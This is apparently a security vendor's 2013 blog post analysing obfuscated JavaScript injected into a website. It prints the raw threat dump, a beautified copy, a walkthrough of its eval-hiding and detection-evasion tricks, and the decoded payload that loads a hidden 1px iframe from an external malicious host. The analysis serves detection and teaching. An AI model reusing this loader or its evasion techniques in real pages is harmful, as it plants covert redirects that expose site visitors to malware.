Monday, March 25, 2013

Obfuscated JavaScript to load hidden iframe with malicious redirection

Obfuscated JavaScript used to load hidden iframe with malicious link

This sort of malicious redirection, which relies on obfuscated execution of eval, was detected by the Website malware scanner. In this case the script contained many redundant "if" statements intended to bypass detection mechanisms. The reference to eval is passed through several variables to mask the call from malware detection engines.

Full website malware scan report: http://goo.gl/JhYp5
Submission date: Sun Mar 24 16:27:53 2013
Threat dump:
[[                                                                                                                                                                                                                                                          ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body%26=5151}catch(gdsgd){v="eval";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{}catch(q){asd=1;}if(!asd){w={a:window}.a;vv=v;}}e=w[vv];if(1){f=new Array(050,0146,0165,0156,0143,0164,0151,0157,0156,040,050,051,040,0173,015,012,040,040,040,040,0166,0141,0162,040,0157,0165,040,075,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0143,0162,0145,0141,0164,0145,0105,0154,0145,0155,0145,0156,0164,050,047,0151,0146,0162,0141,0155,0145,047,051,073,015,012,015,012,040,040,040,040,0157,0165,056,0163,0162,0143,040,075,040,047,0150,0164,0164,0160,072,057,057,0167,0167,0167,056,0163,0165,0172,0165,0153,0151,0147,0163,0162,066,060,060,056,0156,0145,0164,0141,0165,056,0156,0145,0164,057,0143,0157,0165,0156,0164,0145,0162,056,0160,0150,0160,047,073,015,012,040,040,040,040,0157,0165,056,0163,0164,0171,0154,0145,056,0160,0157,0163,0151,0164,0151,0157,0156,040,075,040,047,0141,0142,0163,0157,0154,0165,0164,0145,047,073,015,012,040,040,040,040,0157,0165,056,0163,0164,0171,0154,0145,056,0142,0157,0162,0144,0145,0162,040,075,040,047,060,047,073,015,012,040,040,040,040,0157,0165,056,0163,0164,0171,0154,0145,056,0150,0145,0151,0147,0150,0164,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0157,0165,056,0163,0164,0171,0154,0145,056,0167,0151,0144,0164,0150,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0157,0165,056,0163,0164,0171,0154,0145,056,0154,0145,0146,0164,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0157,0165,056,0163,0164,0171,0154,0145,056,0164,0157,0160,040,075,040,047,061,0160,0170,047,073,015,012,015,012,040,040,040,040,0151,0146,040,050,041,0144,0157,0143,0165,0155,0145,0156,0164,056,0147,0145,0164,0105,0154,0145,
0155,0145,0156,0164,0102,0171,0111,0144,050,047,0157,0165,047,051,051,040,0173,015,012,040,040,040,040,040,040,040,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0167,0162,0151,0164,0145,050,047,074,0144,0151,0166,040,0151,0144,075,0134,047,0157,0165,0134,047,076,074,057,0144,0151,0166,076,047,051,073,015,012,040,040,040,040,040,040,040,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0147,0145,0164,0105,0154,0145,0155,0145,0156,0164,0102,0171,0111,0144,050,047,0157,0165,047,051,056,0141,0160,0160,0145,0156,0144,0103,0150,0151,0154,0144,050,0157,0165,051,073,015,012,040,040,040,040,0175,015,012,0175,051,050,051,073);}w=f;s=[];if(window.document)for(i=2-2;-i+471!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]);}xz=e;if(v)xz(s)}]]

Snapshot from Quttera's Online Malware Scanner:






















The beautified script 

/* Beautified copy of the injected script. It is a decoder stub: it reaches
   String.fromCharCode and eval through indirect property lookups, rebuilds a
   second script from an array of octal character codes, and passes the result
   to eval. All names are undeclared globals. */
/* ff ends up referencing String.fromCharCode; the method name only appears as
   a string literal, never as a direct call. */
ff = String;
fff = "fromCharCode";
ff = ff[fff];
 /* zz is assigned here but not read anywhere in this listing. */
 zz = 3;
 try {
     /* NOTE(review): as printed, this line is not a valid assignment. The raw
        dump shows "document.body%26=5151", and %26 is the URL encoding of "&",
        so the original was presumably "document.body &= 5151" - confirm against
        the infected file. The walkthrough on this page relies on this statement
        throwing, which moves execution into the catch block below. */
     document.body % 26 = 5151
 } catch (gdsgd) {
     /* The name "eval" is kept as a string so it can be used as a property key. */
     v = "eval";
     if (document) try {
             /* Second deliberate failure: per the page's walkthrough this
                assignment throws as well, so the inner catch runs. */
             document.body = 12;
     } catch (gdsgsdg) {
         asd = 0;
         /* Empty try never throws, so asd stays 0 and the if below is taken. */
         try {} catch (q) {
             asd = 1;
         }
         if (!asd) {
             /* Equivalent to w = window, wrapped in an object literal. */
             w = {
                 a: window
             }.a;
             vv = v;
         }
     }
     /* e = window["eval"]: a reference to eval obtained without writing eval(...). */
     e = w[vv];
     if (1) {
         /* Character codes of the second-stage script, written as legacy octal
            literals (e.g. 050 is 40, the code for "("). */
         f = new Array(050, 0146, 0165, 0156, 0143, 0164, 0151, 0157, 0156, 040, 050, 051, 040, 0173, 015, 012, 040, 040, 040, 040, 0166, 0141, 0162, 040, 0157, 0165, 040, 075, 040, 0144, 0157, 0143, 0165, 0155, 0145, 0156, 0164, 056, 0143, 0162, 0145, 0141, 0164, 0145, 0105, 0154, 0145, 0155, 0145, 0156, 0164, 050, 047, 0151, 0146, 0162, 0141, 0155, 0145, 047, 051, 073, 015, 012, 015, 012, 040, 040, 040, 040, 0157, 0165, 056, 0163, 0162, 0143, 040, 075, 040, 047, 0150, 0164, 0164, 0160, 072, 057, 057, 0167, 0167, 0167, 056, 0163, 0165, 0172, 0165, 0153, 0151, 0147, 0163, 0162, 066, 060, 060, 056, 0156, 0145, 0164, 0141, 0165, 056, 0156, 0145, 0164, 057, 0143, 0157, 0165, 0156, 0164, 0145, 0162, 056, 0160, 0150, 0160, 047, 073, 015, 012, 040, 040, 040, 040, 0157, 0165, 056, 0163, 0164, 0171, 0154, 0145, 056, 0160, 0157, 0163, 0151, 0164, 0151, 0157, 0156, 040, 075, 040, 047, 0141, 0142, 0163, 0157, 0154, 0165, 0164, 0145, 047, 073, 015, 012, 040, 040, 040, 040, 0157, 0165, 056, 0163, 0164, 0171, 0154, 0145, 056, 0142, 0157, 0162, 0144, 0145, 0162, 040, 075, 040, 047, 060, 047, 073, 015, 012, 040, 040, 040, 040, 0157, 0165, 056, 0163, 0164, 0171, 0154, 0145, 056, 0150, 0145, 0151, 0147, 0150, 0164, 040, 075, 040, 047, 061, 0160, 0170, 047, 073, 015, 012, 040, 040, 040, 040, 0157, 0165, 056, 0163, 0164, 0171, 0154, 0145, 056, 0167, 0151, 0144, 0164, 0150, 040, 075, 040, 047, 061, 0160, 0170, 047, 073, 015, 012, 040, 040, 040, 040, 0157, 0165, 056, 0163, 0164, 0171, 0154, 0145, 056, 0154, 0145, 0146, 0164, 040, 075, 040, 047, 061, 0160, 0170, 047, 073, 015, 012, 040, 040, 040, 040, 0157, 0165, 056, 0163, 0164, 0171, 0154, 0145, 056, 0164, 0157, 0160, 040, 075, 040, 047, 061, 0160, 0170, 047, 073, 015, 012, 015, 012, 040, 040, 040, 040, 0151, 0146, 040, 050, 041, 0144, 0157, 0143, 0165, 0155, 0145, 0156, 0164, 056, 0147, 0145, 0164, 0105, 0154, 0145, 0155, 0145, 0156, 0164, 0102, 0171, 0111, 0144, 050, 047, 0157, 0165, 047, 051, 051, 040, 0173, 015, 012, 040, 040, 040, 
040, 040, 040, 040, 040, 0144, 0157, 0143, 0165, 0155, 0145, 0156, 0164, 056, 0167, 0162, 0151, 0164, 0145, 050, 047, 074, 0144, 0151, 0166, 040, 0151, 0144, 075, 0134, 047, 0157, 0165, 0134, 047, 076, 074, 057, 0144, 0151, 0166, 076, 047, 051, 073, 015, 012, 040, 040, 040, 040, 040, 040, 040, 040, 0144, 0157, 0143, 0165, 0155, 0145, 0156, 0164, 056, 0147, 0145, 0164, 0105, 0154, 0145, 0155, 0145, 0156, 0164, 0102, 0171, 0111, 0144, 050, 047, 0157, 0165, 047, 051, 056, 0141, 0160, 0160, 0145, 0156, 0144, 0103, 0150, 0151, 0154, 0144, 050, 0157, 0165, 051, 073, 015, 012, 040, 040, 040, 040, 0175, 015, 012, 0175, 051, 050, 051, 073);
     }
     /* w is reused: from here on it is the code array, no longer window. */
     w = f;
     /* s starts as an empty array; the first "+" with a string turns it into a
        string, so it accumulates the decoded text. */
     s = [];
     /* Loop runs for i = 0..470 (it stops when -i + 471 reaches 0). */
     if (window.document) for (i = 2 - 2; - i + 471 != 0; i += 1) {
             j = i;
             /* 031 (octal) and 0x19 (hex) are both 25, so the test is always
                true; e is the eval function, also truthy. Net effect:
                s += String.fromCharCode(f[j]). */
             if ((031 == 0x19)) if (e) s = s + ff(w[j]);
     }
     /* xz is one more alias for eval; v is the non-empty string "eval", so the
        condition holds and the decoded script in s is evaluated. */
     xz = e;
     if (v) xz(s)
 }

The obfuscation flow

  1. ff = String;
    fff = "fromCharCode";
    ff = ff[fff];
    /* ff now refers to String's fromCharCode method, i.e. ff = String.fromCharCode */
  2. try { document.body % 26 = 5151
    /* since body is an object or a string, the numeric operation raises an exception and the following "catch" block is executed (the "%26" in the dump is most likely a URL-encoded "&", i.e. document.body &= 5151) */
    } catch (gdsgd) { v = "eval";
    /* v holds the string "eval"; it is used below as a property name, so the final call is identical to eval("javascript code") */
  3. if (document) try {
    document.body = 12;
    /* the same as before: the assignment above raises an exception, so the catch block below runs */ } catch (gdsgsdg) {
    asd = 0;
    try {} catch (q) {
    /* try block is empty, catch block is skipped and asd will remain zero */
    asd = 1;
    }
  4. if (!asd) {
    /* since asd is zero, this block is executed; the following trick is identical to "w = window" */
    w = { a: window }.a;
    vv = v; /* vv = "eval" */
    }
    /* w equals window and vv equals "eval", so this instruction is identical to e = window["eval"] */
    e = w[vv];
    if (1) {
    /* 1 is true so execution flow enters this if block */
  5. if (window.document){
    /* window.document is object so it is always true and execution flow enters this block */
    for (i = 2 - 2; - i + 471 != 0; i += 1) {
    j = i;
    if ((031 == 0x19)){
    /* this compares the same value (25) written in octal and in hexadecimal notation, so it is always true */
    if (e){
    /* e points to the eval function, so it is true and execution enters this block */
    s = s + ff(w[j]);
    /* by this point w has been reassigned to the octal array f (w = f in the beautified script), so this equals s = s + String.fromCharCode(f[j]) */
    } } } }
  6. xz = e;
    /* xz now points to eval method */
    if (v){
    /* v holds the non-empty string "eval", so it is "true" and thus eval(s) will be executed */
    xz(s)

The malicious injection

By the time this post was created the site was already down.
The simplified version of the threat is:

/* Decoded second stage as published, with the host defanged using [.].
   It creates an iframe that is absolutely positioned, borderless and 1px by
   1px, and points it at a remote counter.php.
   The string passed to document.write was lost when this page was rendered;
   the octal array in the beautified script decodes it to an empty
   <div id='ou'></div>, the container the iframe is appended to.
   The getElementById('ou') check means the container and iframe are only
   injected when no element with that id exists yet. */
(function () { var ou = document.createElement('iframe'); ou.src = 'http://www.suzukigsr600[.]netau[.]net/counter.php'; ou.style.position = 'absolute'; ou.style.border = '0'; ou.style.height = '1px'; ou.style.width = '1px'; ou.style.left = '1px'; ou.style.top = '1px'; if (!document.getElementById('ou')) { document.write('
'); document.getElementById('ou').appendChild(ou); } })();


The iframe loaded the file from an external malicious resource. Such threats are trickier to detect and remediate. Detection of these and other JavaScript obfuscation techniques is "built-in" to Website Anti-malware Monitoring, and the user is notified instantly once one is identified.